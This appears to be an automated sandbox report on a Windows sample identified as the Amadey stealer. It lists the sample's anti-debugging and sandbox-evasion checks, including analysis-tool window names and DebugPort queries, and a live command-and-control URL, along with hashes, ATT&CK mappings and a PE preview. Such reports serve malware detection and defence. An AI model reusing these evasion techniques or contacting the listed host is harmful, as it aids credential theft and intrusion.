Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 4_2_04F00130 Start: 04F001A2 End: 04F00185

4_2_04F00130

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04F600B8 rdtsc

0_2_04F600B8

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_0053645B mov eax, dword ptr fs:[00000030h]		4_2_0053645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_0053A1C2 mov eax, dword ptr fs:[00000030h]		4_2_0053A1C2

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: PProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 4_2_0051D312 cpuid

4_2_0051D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 4_2_0051CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

4_2_0051CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 3.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.setup.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2188818191.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2126010864.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128912313.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2166411163.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2157568519.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2116812942.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2088563271.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
setup.exe	100%	Avira	TR/Crypt.TPM.Gen
setup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.215.113.16/Jo89Ku7d/index.phpHead	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpd	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php_	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phph	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpIG	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php$	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php-	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php#	100%	Avira URL Cloud	phishing
http://185.215.1	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpW	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpX	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpT	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpP	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncodedi	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpS	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpeGk	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpcoded	100%	Avira URL Cloud	phishing
http://185.2	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php8	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php3	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php7	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php6	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
15.164.165.52.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php-	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpHead	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpIG	axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phph	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php$	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpd	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php#	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php_	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?	axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.1	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpX	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpW	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedi	axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpT	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpS	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpeGk	axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpP	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpcoded	axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpH	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.2	axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpded	axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php8	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php7	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpw	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.php6	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php3	axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phps	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpp	axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483209
Start date and time:	2024-07-26 20:58:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 6204 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 6636 because there are no executed function
Execution Graph export aborted for target setup.exe, PID 4200 because it is empty
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: setup.exe

Simulations

Behavior and APIs

Time	Type	Description
14:59:01	API Interceptor	3256185x Sleep call for process: axplong.exe modified
20:58:54	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	PE1dBCFKZv.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	random.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1933312
Entropy (8bit):	7.952210931809818
Encrypted:	false
SSDEEP:	24576:oIvyMO1yy9rBJGj1vReUIRT8e+SMT5OClJ4xMwp/isDudUf+sDDLTjWJMKMy2xzQ:oQq98Id7MdOCluSo/xDu8pDDaMRCJ1l
MD5:	2A846C38FB95E0103773296F7E7794EB
SHA1:	57957DC05264A8580D1494D0152018BE250D22A3
SHA-256:	5F88CEDCC10D3ED6D330E1223602452CB5FE1210E8D245A4C0A7FF1991A23373
SHA-512:	D35EDBC153D607857A32C93A28E26C9672DE679DE94AEA1C032B6A45EC402321F8BECA3679073F50CC1AA8DA94D5781424A7733DAB3BAFB65CE7E14A1D52AED2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................L...........@.................................W...k...........................x.L.............................(.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...aosdyjib.p...02..d..................@...ttauocqi......L......X..............@....taggant.0....L.."...^..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	3.4286524963479907
Encrypted:	false
SSDEEP:	6:bz9/XlXUEZ+lX1lOJUPelkDdtE9+AQy0l1Xyldt0:1f1Q1lOmeeDs9+nV1Cldt0
MD5:	BA1A5FC89388CF71223DDB59D45A414F
SHA1:	CB48D849C6098A6DC048C4836270CB0283688ED1
SHA-256:	A74520071DB1450A99ED134B7E63871DF5337116B296AA788F4E97763572667A
SHA-512:	A86D8112502989243E58F7388DC13296109A38BB6634579AB685E2C608CEF81C3AE4E6BCC139C52F54D1719E2ABCF7E7845034DAC57C18B93577D86747551C15
Malicious:	false
Reputation:	low
Preview:	....VPC....H.<.....F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................;.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.952210931809818
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.exe
File size:	1'933'312 bytes
MD5:	2a846c38fb95e0103773296f7e7794eb
SHA1:	57957dc05264a8580d1494d0152018be250d22a3
SHA256:	5f88cedcc10d3ed6d330e1223602452cb5fe1210e8d245a4c0a7ff1991a23373
SHA512:	d35edbc153d607857a32c93a28e26c9672de679de94aea1c032b6a45ec402321f8beca3679073f50cc1aa8da94d5781424a7733dab3bafb65ce7e14a1d52aed2
SSDEEP:	24576:oIvyMO1yy9rBJGj1vReUIRT8e+SMT5OClJ4xMwp/isDudUf+sDDLTjWJMKMy2xzQ:oQq98Id7MdOCluSo/xDu8pDDaMRCJ1l
TLSH:	749533F42C68B487D7EC2AF92C0245722A3865495CD2B913FD0E106F74E75AB26EAC5C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8cb000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F47D881B5BAh
divps xmm3, dqword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c9078	0x10	aosdyjib
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c9028	0x18	aosdyjib
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
